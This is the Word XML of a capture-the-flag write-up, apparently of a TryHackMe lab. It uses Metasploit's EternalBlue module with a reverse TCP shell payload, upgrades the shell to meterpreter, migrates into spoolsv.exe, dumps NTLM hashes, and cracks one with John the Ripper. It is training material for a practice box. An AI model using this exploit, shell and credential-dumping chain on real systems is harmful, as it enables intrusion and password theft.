            <wp:extent cx="5934075" cy="1476375"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="3669177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4075" cy="1476375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBAB5E4" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58"/>
    <w:p w14:paraId="6BE0BA6D" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve">Configure </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>rhosts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="275CD632" w14:textId="0DD82EB0" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B82EDA1" wp14:editId="36E86E31">
            <wp:extent cx="5934075" cy="2009775"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="14654996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2009775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D17EF1" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rhosts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> area is blank, so we need to set it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1699A90B" w14:textId="74FFD6DD" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EE38640" wp14:editId="66535B9E">
            <wp:extent cx="5943600" cy="3133725"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="6498580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133725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FF4AF4" w14:textId="15E2CB1B" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve">THM says it wants me to use a typical shell in the reverse shell payload instead the default </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve">… not sure why, but </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>I’ll</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve"> comply.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EB5459" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:t>msf6 exploit(windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>/ms17_010_eternalblue) &gt; set payload windows/x64/shell/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4DB0D6F8" w14:textId="38969729" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:t>payload =&gt; windows/x64/shell/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1433B74C" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:t>Note, it was [(windows/x64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve">)] thus, the difference changing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve"> to shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0801ECE5" w14:textId="3497143B" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D1552DE" wp14:editId="2DB5DAC9">
            <wp:extent cx="5934075" cy="2305050"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="20190782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2305050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0B91DD" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58"/>
    <w:p w14:paraId="19E7880E" w14:textId="6E1296AC" w:rsidR="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:t>Oh, well this next portion is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> rather</w:t>
      </w:r>
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve"> contrived. The whole goal is to escalate into a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve"> shell. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>I’m</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve"> just going to assume launching the attack with a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve"> payload is broken so we have to do this escalation path. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592C83C3" w14:textId="77777777" w:rsidR="00CE3D9C" w:rsidRDefault="00CE3D9C" w:rsidP="006C7C58"/>
    <w:p w14:paraId="58B0A842" w14:textId="3E07D86D" w:rsidR="00CE3D9C" w:rsidRPr="006C7C58" w:rsidRDefault="00CE3D9C" w:rsidP="006C7C58">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Shell_to_meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> can escalate a session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625B4079" w14:textId="2599FBC5" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CEE689E" wp14:editId="320C86BE">
            <wp:extent cx="5943600" cy="2819400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4611927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819400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C5556B" w14:textId="4BD4AA00" w:rsidR="006C7C58" w:rsidRDefault="004F037E" w:rsidP="006C7C58">
      <w:r>
        <w:t xml:space="preserve">We need to set the attack </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and the shell session to upgrade it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38303CCA" w14:textId="0AE961DE" w:rsidR="004F037E" w:rsidRDefault="004F037E" w:rsidP="006C7C58">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="332AAB74" wp14:editId="2F7A8913">
            <wp:extent cx="5943600" cy="2419350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="212555666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419350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="144115D6" w14:textId="3891FC33" w:rsidR="004F037E" w:rsidRDefault="004F037E" w:rsidP="006C7C58">
      <w:r>
        <w:t xml:space="preserve">By using </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Sessions ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we see that session id 1 is our basic shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629390F4" w14:textId="169EDB3A" w:rsidR="004F037E" w:rsidRPr="006C7C58" w:rsidRDefault="004F037E" w:rsidP="006C7C58">
      <w:r>
        <w:t xml:space="preserve">This is what it looks like when it runs, opening a second session of Type: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F567A82" wp14:editId="27D4E617">
            <wp:extent cx="5934075" cy="2209800"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="16102991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4075" cy="2209800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9B39DF" w14:textId="6581D9F1" w:rsidR="004F037E" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve">Spoolsv.exe is preferred to migrate to, a printer process </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>that’s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve"> always running, and always matches </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>arcitecture</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A024F9E" w14:textId="4993DA52" w:rsidR="004F037E" w:rsidRPr="004F037E" w:rsidRDefault="004F037E" w:rsidP="006C7C58">
      <w:r w:rsidRPr="004F037E">
        <w:t xml:space="preserve">Use command: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F037E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F037E">
        <w:t xml:space="preserve"> to show processes running</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. We need one running as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> authority system, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ans</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> spoolsv.exe always has that.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BC0367" w14:textId="46311F12" w:rsidR="004F037E" w:rsidRPr="006C7C58" w:rsidRDefault="004F037E" w:rsidP="006C7C58">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37187D45" wp14:editId="6A4A79D7">
            <wp:extent cx="5934075" cy="1847850"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="4633790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4075" cy="1847850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="221B92A8" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:t>After migrating, the hash data is as follows (printed in text for easier use to replicate cracking the hashes than manual typing via screenshot)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D5EBEF" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hashdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3F253CB5" w14:textId="41A07943" w:rsidR="004F037E" w:rsidRPr="006C7C58" w:rsidRDefault="004F037E" w:rsidP="006C7C58">
      <w:r w:rsidRPr="004F037E">
        <w:t xml:space="preserve">get hashes from the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004F037E">
        <w:t>etc.shadow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004F037E">
        <w:t xml:space="preserve"> file, this just does it quick</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C8EC71" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:t>Administrator:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>500:aad</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622382DD" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:t>Guest:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>501:aad</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076053FF" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:t>Jon:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>1000:aad</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15830CD8" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58"/>
    <w:p w14:paraId="5F907E94" w14:textId="4E085828" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FCF1498" wp14:editId="2BD9651A">
            <wp:extent cx="5943600" cy="1087120"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1368824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087120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="62045D9B" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve">Cracking with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>jon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve"> the ripper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C87FE57" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve">First get the hash into a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>textfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF97B46" w14:textId="4458CE9D" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C7C58">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>echo ‘Jon:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1000:aad</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::’ &gt; myhash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFB072C" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve">Then </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t>we’ll</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:t xml:space="preserve"> crack it, specifying that it’s NT format. User hashes in windows are usually in this, and you can identify it by the funny usage of colons, at a glance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154ED530" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRPr="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58"/>
    <w:p w14:paraId="0C5560BE" w14:textId="77777777" w:rsidR="006C7C58" w:rsidRDefault="006C7C58" w:rsidP="006C7C58">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C7C58">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>john myhash.txt --format=NT --wordlist=/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C7C58">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C7C58">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB3F9A8" w14:textId="3559F8A3" w:rsidR="004F037E" w:rsidRPr="004F037E" w:rsidRDefault="004F037E" w:rsidP="006C7C58">
      <w:r w:rsidRPr="004F037E">
        <w:t>flag 1 is at the top of the C drive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5717AD70" w14:textId="2D92CE0E" w:rsidR="004F037E" w:rsidRDefault="004F037E" w:rsidP="006C7C58">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C6C68B5" wp14:editId="43479F4A">
            <wp:extent cx="5943600" cy="3429000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20711964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429000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E095F6B" w14:textId="5FE314B9" w:rsidR="004F037E" w:rsidRPr="004F037E" w:rsidRDefault="004F037E" w:rsidP="006C7C58">
      <w:r w:rsidRPr="004F037E">
        <w:t xml:space="preserve">Other flags are omitted because </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004F037E">
        <w:t>it’s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004F037E">
        <w:t xml:space="preserve"> just file navigation, one to root’s documents, and another to the desktop of user Jon. That portion of the exercise failed to achieve meaningful learning objectives, so should be revised in adopting to a classroom setting, as </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004F037E">
        <w:t>it’s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004F037E">
        <w:t xml:space="preserve"> little more than a guessing game without having context established. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5602433A" w14:textId="73F7BE6F" w:rsidR="004F037E" w:rsidRPr="006C7C58" w:rsidRDefault="004F037E" w:rsidP="006C7C58"/>
    <w:sectPr w:rsidR="004F037E" w:rsidRPr="006C7C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C58"/>
    <w:rsid w:val="004F037E"/>
    <w:rsid w:val="006C7C58"/>
    <w:rsid w:val="00BC735B"/>
    <w:rsid w:val="00CE3D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3C17C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2FDC3E2E-FF7F-452B-B1E1-3D9D5BA33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C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7C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7C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7C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7C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7C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C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C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C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C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7C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7C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7C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7C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7C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C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C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C58"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="006C7C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C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C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C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C58"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="006C7C58"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="006C7C58"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="006C7C58"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="006C7C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7C58"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
